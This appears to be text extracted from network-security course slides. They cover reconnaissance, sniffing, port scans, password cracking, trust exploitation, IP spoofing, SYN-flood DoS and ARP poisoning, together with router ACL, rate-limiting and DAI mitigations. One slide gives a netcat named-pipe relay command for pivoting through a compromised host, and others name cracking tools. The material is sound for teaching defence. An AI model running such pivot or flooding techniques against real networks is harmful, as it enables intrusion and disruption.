Reconnaissance refers to the overall act of learning information about a target network by using readily available information and applications.
Reconnaissance attacks include these attacks:
Internet information queries
A packet sniffer is a software application that uses a network adapter card in promiscuous mode to capture all network packets. There are packet sniffer features:
Packet sniffers exploit information passed in clear text. Protocols that pass information in clear text are Telnet, FTP, SNMP, Post Office Protocol (POP), and HTTP.
Packet sniffers must be on the same collision domain as the machine that they are targeting.
Packet sniffers can be used legitimately or can be designed specifically for attack.
Host A Host B Router A Router B
Packet Sniffer Attack Mitigation
Here are some packet sniffer mitigation techniques and tools:
Host A Host B Router A Router B
Port Scans and Ping Sweeps
Port scan and ping sweep attacks:
Identify all services on the network
Identify all hosts and devices on the network
Identify the operating systems on the network
Identify vulnerabilities on the network
Ping Sweep with NMAP
Ping Sweep (cont.)
Blocking Ping Sweeps
access-list 102 deny icmp any any echo
access-list 102 permit ip any any
ip address 10.1.1.254 255.255.255.0
ip access-group 102 in
Seems like it worked but ???
We give out too much information…
To block messages originating from the blocking router…
access-list 103 permit icmp any any unreachable
class-map match-all STOPSHARING
match access-group 103!
service-policy output STOPSHARING
But this time we don’t share info…
Simple UDP Port Scan
Destination Unreachable (Port)
How to block…
access-list 101 deny icmp any any unreachable
access-list 101 permit ip any any
ip address 10.1.1.254 255.255.255.0
ip access-group 101 out
We don’t send any unreachable messages…
After Blocking everything seems open, some obscurity for scanner…
Port scans and ping sweeps cannot be prevented without compromising network capabilities.
Port Scan and Ping Sweep Attack Mitigation However, damage can be mitigated using IPS at the network and host levels. Workstation with HIPS Laptop with HIPS Scan Port Shared Connection IDS and IPS
Internet Information Queries
Sample IP address query
Attackers can use Internet tools such as whois as a weapon.
Intruders use access attacks on networks or systems for the these reasons:
Escalate their access privileges
Access attacks include:
Hackers implement password attacks using:
Trojan horse programs
Password Attack Example
The bgp_md5crack tool is used for cracking a secret used for RFC2385 based packet signing and authentication. It is designed for offline cracking, means to work on a sniffed, correct signed packet. This packet can either be directly sniffed of the wire or be provided in a pcap file.
For Routing Protocols…
Simple Cracking with Cain…
A hacker leverages existing trust relationships.
Several trust models exist:
Linux and UNIX:
System A User = psmith; Pat Smith System B is compromised by a hacker. User = psmith; Pat Smith Hacker User = psmith; Pat Smithson A hacker gains access to System A .
System A trusts System B.
System B trusts everyone.
System A trusts everyone.
Port Redirection Host B Attacker Source: A Destination: B Port: 23 Compromised Host A Source: Attacker Destination: A Port: 22 Source: Attacker Destination: B Port: 23
Port Redirection Configuration
On HOSTA we create a named pipe using the mkfifo commands: #pipe will be the name of our named pipe mkfifo pipe
We then create our two way tunnel using Netcat on HOSTA: nc -lvp 25 <pipe | nc -t 10.1.2.253 23 >pipe
Then telnet from Attacker machine
telnet 10.1.2.1 80
Here we are connected to the internal switch…
IP spoofing occurs when a hacker inside or outside a network impersonates a trusted source.
IP spoofing uses trusted internal IP addresses or trusted external IP addresses.
Attackers use IP spoofing for many reasons:
To gain root access
To inject malicious data or commands into an existing data stream
To divert network packets to the hacker who can then reply as a trusted user by changing the routing tables
To crash servers by overloading memory (DoS)
As a step in a larger attack
IP Spoofing—Types of Attack
IP spoofing attacks are either:
The attacker sniffs sequence numbers (i.e., from inside the subnet of the victim).
The attacker calculates sequence numbers.
IP spoofing can lead to these types of attacks:
Distributed DoS (DDoS) attack
Let’s see in action
Here we drive router to reply to the other host..
A man-in-the-middle attack requires that the hacker has access to network packets that come across a network.
A man-in-the-middle attack is implemented using the following:
Network packet sniffers (nonblind attack)
Routing and transport protocols (blind attack)
Host A Host B Router A Router B Data in Clear Text
IP Spoofing Attack Mitigation
The threat of IP spoofing can be reduced, but not eliminated, using these measures:
Strong access control at the router
ACLs on outbound interface
ACLs on inbound interface
Additional authentication requirements
Host A Host B Router A ISP Router B IPSec tunnel
A DoS attack damages or corrupts your computer system or denies you and others access to your networks, systems, or services.
DoS attack techniques almost always use IP spoofing.
TCP SYN Flooding DoS Attack AttackerTCP Client ------------- Client Ports 1024 – 65535 Victim TCP Server ------------- Service Ports 1–1024 80 ? SYN Packet with Spoofed Source Address TCP Client ------------- Client Ports 1024–65535 TCP Three-Way Handshake 1 SYN 2 SYN and ACK TCP Server ------------- Service Ports 1 – 1024 80 1 SYN 3 ACK 2 SYN and ACK
DoS and DDoS attacks have these characteristics:
They are not generally targeted to gain access.
They aim at making a service unavailable.
They require very little effort to execute.
They are difficult to eliminate.
Attacker Victim Attack Control Mechanism Victim Zombie Zombie Zombie
DDoS Example Handler Systems Client System
The client issues commands to handlers that control agents in a mass attack.
The cracker looks for targets.
The cracker installs software to scan, compromise, and infect agents with zombies.
Agents are loaded with remote control attack software.
SYN Flooding Attack
Let’s be more creative…
We put almost 1 million packets in one minute period on the wire, not so bad….
DoS and DDoS Attack Mitigation
Reduce DoS and DDoS attacks by:
Protecting yourself against IP spoofing with ingress- and egress-filtering ACLs
Using antivirus software to find zombie agents
Using anti-DoS features on routers and firewalls
ip verify unicast reverse-path interface command
ACLs to filter all private Internet address space (RFC 1918)
Using traffic rate limiting at the ISP level
Use class-based traffic policing on ICMP packets
Use SYN rate limiting
What rate limiting does:
Allows network managers to set bandwidth thresholds for users and by traffic type
Prevents the deliberate or accidental flooding of the network
Keeps traffic flowing smoothly
Rate Limiting for Different Classes of Users Network Manager Teachers Students 2 Mbps 10 Mbps 50 Mbps Otherwise, there can be a deliberate or accidental slowdown or freezing of the network.
ARP Table in Host C C IP 10.1.1.3 MAC C.C.C.C 1. IP 10.1.1.2 ? MAC for 10.1.1.1 2. Legitimate ARP reply 10.1.1.1 = MAC B.B.B.B 3. Subsequent gratuitous ARP replies overwrite legitimate replies
10.1.1.1 bound to C.C.C.C
10.1.1.2 bound to C.C.C.C
Attacker IP 10.1.1.1 MAC B.B.B.B A B C A = host A B = host B C = host C
Mitigating Man-in-the-Middle Attacks with DAI
MAC or IP Tracking Built on DHCP Snooping
10.1.1.1 DHCP Server DHCP Discovery (BCAST) DHCP Offer (UCAST) DAI provides protection against attacks such as ARP poisoning using spoofing tools such as ettercap, dsniff, and arpspoof. Track Discovery Track DHCP Offer MAC or IP Track Subsequent ARPs for MAC or IP 10.1.1.2 DAI Function:
DAI in Action
A binding table containing IP-address and MAC-address associations is dynamically populated using DHCP snooping.
10.1.1.1 10.1.1.2 GARP is sent to attempt to change the IP address to MAC bindings. Gateway is 10.1.1.1 Attacker is not gateway according to this binding table I am your gateway: 10.1.1.1 10.1.1.2
ip arp inspection vlan 20
ip arp inspection vlan 20 logging dhcp-bindings all